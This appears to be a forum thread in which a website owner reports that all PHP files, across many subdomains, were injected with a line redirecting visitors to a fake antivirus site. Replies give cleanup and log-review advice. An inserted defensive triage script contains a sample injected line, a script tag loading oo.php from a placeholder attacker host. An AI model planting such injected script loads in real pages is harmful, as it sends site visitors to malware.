PHP WEBSITE HIJACKED - Php code infected - HELP?

  • Thread starter: bigdawg723
  • Tags: Code, Php
AI Thread Summary
A website owner has reported a severe security breach, where every PHP file across multiple subdomains has been infected with a redirect script leading to a fake antivirus site. The infection affects all PHP files, including includes and root directories, indicating a widespread compromise. The owner suspects a vulnerability in their contact form, which may allow malicious code to enter the database, although no such entries have been found. Forum participants suggest immediate steps to diagnose and mitigate the issue, including searching for modified non-PHP files, identifying PHP files that reference the malicious site, and reviewing HTTP access logs to trace the attack's origin. The discussion highlights a potential connection to widespread issues on shared servers, particularly with GoDaddy, and emphasizes the importance of securing the site to prevent reinfection. Options discussed include either starting fresh by deleting everything or identifying and fixing the underlying vulnerability before restoring the site. The urgency of shutting down the site until the problem is resolved is also stressed.
bigdawg723
WEBSITE HIJACKED - Php code infected! - HELP!?

Hey All,

I've got a major *$%#@ problem. I'm freaking out here.

Check this out.

On my website, I have a way to allow visitors... to become distributors and sell my product as well. When they become a distributor, it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.

So... not only do I have my set of about 20 php pages and a solid 20+ php includes... I have to multiply those numbers by roughly... 50 distributors or more!

Here's my problem.

EVERY, not just a few... not just the pages (also includes, etc)... not just my root directory (also all subdomains)... EVERY PHP FILE has a new line of code at the very top that is a Script to a php file (oo.php) on another website that redirects every visitor to a new site and it's one of those 'fake antivirus' programs that are, essentially, a virus in their own right.

When I first saw the redirect, I knew I was hijacked... but I assumed it was just 1 thing injected into my SQL Databases... or a simple code change or file somewhere... but it is THOUSANDS of files... and yes, I could go ahead and remove that snippet of code from each php file... but I still wouldn't know where it came from and I can only assume that the process which infected those pages still exists and would reinfect them all again in the very near future.

I'm begging you for help.

I know my contact form doesn't "close" the inputs or something... because it sends all contacts to the database table... and there's some major vulnerability there... but I couldn't find any entry in that database with any malicious code... perhaps it auto-deleted itself or something?

Please, I beg you, please lend a hand if you know anything about this.

Thank You,
Josh
 


it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.
What is "it"? Is "it" from a trusted source? I am by no means an expert with these things, but that was the first thing that got my attention.
 


First up, do a search on google for text snippets of the php line that was added. If someone else has been fighting this battle already, they'll be a good candidate to help solve the problem.

Otherwise, not enough information. Something on your site that has write access to your PHP files is either currently compromised, or is still vulnerable and was/is being attacked. What OS are you on? Do you have script access? Cron access? Who's your ISP? Has anything else been modified?

Step 1, look for non-PHP files that have been modified recently. Hopefully, you can use that to detect whether or not there's some binary file or otherwise that's sitting on your system that will re-infect you. That's dangerous. If you have some that look suspicious, quarantine them. Make them non-executable and non-readable-- change the file name, whatever. There's a distinct possibility if you've got other programs that have installed themselves, that they'll try to re-install themselves, so check any config files you have. Heck, compare them to backups with your ISP.

Step 2, look for PHP files that have changed that reference the evil site in question. That is, it's possibly just a single PHP file that has write access to other PHP files, and if that PHP file is executed again, you're re-infected.

Step 3, look at your HTTP access log. See what was happening around the time that you were infected, and examine whatever relevant files were accessed during that time. Chances are, the attack started with a web request, and that's one way of trying to narrow down the point of attack. Otherwise, if the infection started in some OTHER way, talk to your ISP.

DaveE
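The three steps above as a small triage script (an added example, not from the thread or from any poster). It builds a constructed sample site in a temp directory so it runs offline; on a real host you would point SITE_ROOT and ACCESS_LOG at the web root and the Apache log. "evil.example" is a placeholder, since the thread never names the host serving oo.php, and the log lines and dates are made up.

```shell
#!/bin/sh
# Constructed sample site: one infected PHP file, one clean one, a recently
# written non-PHP file, and a three-line access log in Apache combined format.
SITE_ROOT=$(mktemp -d)
ACCESS_LOG="$SITE_ROOT/access.log"
cat > "$SITE_ROOT/index.php" <<'EOF'
<script src="http://evil.example/oo.php"></script><?php echo "home"; ?>
EOF
cat > "$SITE_ROOT/clean.php" <<'EOF'
<?php echo "clean"; ?>
EOF
printf 'x' > "$SITE_ROOT/helper.cgi"   # constructed: a non-PHP file to be flagged
cat > "$ACCESS_LOG" <<'EOF'
203.0.113.5 - - [10/May/2010:03:12:01 +0000] "POST /contact.php HTTP/1.1" 200 512
203.0.113.5 - - [10/May/2010:03:12:40 +0000] "GET /images/x.php HTTP/1.1" 200 10
198.51.100.7 - - [11/May/2010:09:00:00 +0000] "GET /index.php HTTP/1.1" 200 2048
EOF

# Step 1: non-PHP files modified within the last N days (default 7).
recent_non_php() {
  find "$1" -type f ! -name '*.php' -mtime -"${2:-7}" | sort
}
# Step 2: PHP files carrying the injected reference to oo.php. The leading
# slash avoids matching unrelated names such as foo.php.
infected_php() {
  find "$1" -type f -name '*.php' -exec grep -l '/oo\.php' {} + | sort
}
# Step 3: access-log lines for one day, given as day/Mon/YYYY, so the
# requests around the infection time can be read in order.
log_window() {
  grep -F "[$2" "$1"
}

echo "== non-PHP files modified in the last 7 days =="; recent_non_php "$SITE_ROOT" 7
echo "== PHP files referencing oo.php ==";             infected_php "$SITE_ROOT"
echo "== access log for the suspected day ==";         log_window "$ACCESS_LOG" 10/May/2010
```

The temp directory is left in place so the listed paths can be inspected afterwards.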
 


I searched for that PHP thread... found it!

http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html

Apparently this happened to "hundreds" of GoDaddy shared servers... I assume thousands!

I've never seen this before... I have a few words for GoDaddy... but they don't care, maybe time for a host switch? They said it was due to outdated versions of WordPress... mine was fully up-to-date at the time of the attack. BS

Thanks for the quick replies though!

I love this forum - more helpful than any PHP-only forum I've found thus far.
 


You have really 2 ways to go with this:

1) Delete everything and start from new
2) Figure out how and where the vulnerability occurred, fix it, and then go about fixing the database issue.

Good luck.
 


Please tell me that you have shut down your site until you fix the problem.
 